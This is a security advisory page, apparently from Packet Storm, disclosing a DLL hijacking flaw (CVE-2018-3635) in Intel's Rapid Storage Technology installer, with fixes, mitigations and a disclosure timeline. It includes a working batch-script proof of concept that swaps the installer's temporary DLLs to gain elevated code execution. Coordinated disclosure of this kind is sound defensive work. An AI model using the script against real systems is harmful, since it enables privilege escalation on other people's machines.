Twenty Year Anniversary

Intel Rapid Storage Technology User Interface And Driver 15.9.0.1015 DLL Hijacking

Intel Rapid Storage Technology User Interface And Driver 15.9.0.1015 DLL Hijacking
Posted Nov 16, 2018
Authored by Stefan Kanthak

Intel Rapid Storage Technology User Interface and Driver version 15.9.0.1015 suffers from a dll hijacking vulnerability.

tags | exploit
systems | windows
MD5 | 588da88e53e05773cd51de3eafe1fcb5

Intel Rapid Storage Technology User Interface And Driver 15.9.0.1015 DLL Hijacking

Change Mirror Download
Hi @ll,

the executable installer of the
Intel(r) Rapid Storage Technology (Intel(r) RST) User Interface and Driver,
version 15.9.0.1015 (LATEST for Windows 7), released 11/14/2017, available
from <https://downloadmirror.intel.com/27400/eng/SetupRST.exe> via
<https://downloadcenter.intel.com/download/27400/Intel-Rapid-Storage-Technology-Intel-RST-User-Interface-and-Driver>
is (SURPRISE!) vulnerable!

CVSS score: 7.5/HIGH CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

See Intel's security advisory SA-00153
<https://www.intel.com/content/www/us/en/security-center/advisory/INTEL-SA-00153.html>


Vulnerability #1:
=================

Although running with ELEVATED (administrative) privileges
(the "application manifest" embedded in SetupRST.exe specifies
"requireAdministrator"), on STANDARD installations of Windows,
i.e. where the user account created during Windows setup is used,
the executable installer creates an UNPROTECTED subdirectory
IIF<abcd>.tmp in the user's %TEMP% directory.

For this well-known and well-documented vulnerability see
<https://cwe.mitre.org/data/definitions/377.html> and
<https://cwe.mitre.org/data/definitions/379.html> plus
<https://capec.mitre.org/data/definitions/29.html>

The subdirectory IIF<abcd>.tmp inherits the NTFS ACLs from its
parent %TEMP%, allowing "full access" for the unprivileged
(owning) user, who can replace/overwrite the DLLs

%TEMP%\IIF<abcd>.tmp\Resource.dll
%TEMP%\IIF<abcd>.tmp\??-??\IntelCommon.dll

later loaded and executed by the installer between their creation
and use.
Since these DLLs are executed with administrative privileges, this
vulnerability results in arbitrary code execution WITH escalation
of privilege.

NOTE: the precondition "user account created during Windows setup"
is met on typical installations of Windows: according to
Microsoft's own security intelligence reports, about 1/2 to
3/4 of the about 600 million Windows installations which send
telemetry data have only ONE active user account.
<https://www.microsoft.com/security/sir>


Demonstration/proof of concept:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. visit <https://skanthak.homepage.t-online.de/sentinel.html>,
then download
<https://skanthak.homepage.t-online.de/skanthak/download/SENTINEL.DLL>
and save it in an arbitrary directory;

2. save the following batch script in the same directory:

--- IIF.CMD ---
:WAIT
@If Not Exist "%TEMP%\IIF????.tmp" Goto :WAIT
For /D %%! In ("%TEMP%\IIF????.tmp") Do Set IIFTMP=%%!
Copy /Y SENTINEL.DLL "%IIFTMP%\Resource.dll"
For /R "%IIFTMP%" %%! In (IntelCommon.dll) Do Copy /Y SENTINEL.DLL "%%!"
Set IIFTMP=
--- EOF ---

3. start the batch script per double-click;

4. execute SetupRST.exe: notice the message boxes displayed from
the replaced DLLs.


Fixes:
~~~~~~

1. ALWAYS specify a PROPER "security descriptor" when you create
(temporary) files or directories in potentially unsafe (i.e.
user-writable) paths like the %TEMP% directory!
See <https://msdn.microsoft.com/en-us/library/aa363855.aspx>
and use the second parameter of CreateDirectory() to properly
restrict the permissions when running elevated!

2. NEVER load resource(-only) DLLs for execution!
See <https://msdn.microsoft.com/en-us/library/ms684179.aspx>
and use the third parameter of LoadLibraryEx() to specify
LOAD_LIBRARY_AS_DATAFILE or LOAD_LIBRARY_AS_IMAGE_RESOURCE


Mitigations:
~~~~~~~~~~~~

1. DONT use executable installers; stay far away from such
eternally vulnerable crap!

2. NEVER run executable installers in unsafe environments,
especially NEVER from UNSAFE directories like "%TEMP%\" or
"%USERPROFILE%\Downloads\"

3. DISABLE execution of files (via NTFS ACL, as shown below) in
the systems and every users %TEMP% and every %USERPROFILE%
(see <https://skanthak.homepage.t-online.de/SAFER.html>)!

4. Practice STRICT privilege separation: use a your privileged
"Administrator" account (especially the account created during
Windows setup) ONLY for administrative tasks, and COMPLETELY
separate unprivileged user accounts, with elevation requests
DISABLED, for your everyday/regular work.



Vulnerability #2:
=================

A variant of #1, resulting in denial of service.


Demonstration/proof of concept:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. add the NTFS access control list entry (D;OIIO;WP;;;WD) meaning
"deny execution of files in this directory for everyone,
inheritable to all subdirectories" to the (user's) %TEMP%
directory.

NOTE: this does NOT need administrative privileges!

2. execute SetupRST.exe: notice the message box
"error loading language resource" displayed.


Fix:
~~~~

Create (temporary) files and directories with PROPER permissions!
See above.


stay tuned
Stefan Kanthak


Timeline:
~~~~~~~~~

2018-06-06 vulnerability report sent to vendor

2018-06-10 Intel acknowledges receipt

2018-06-14 Intel confirms reported vulnerability

2018-10-26 CVE-2018-3635 assigned

2018-11-13 Intel publishes security advisory SA-00153

2018-11-16 vulnerability report published



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close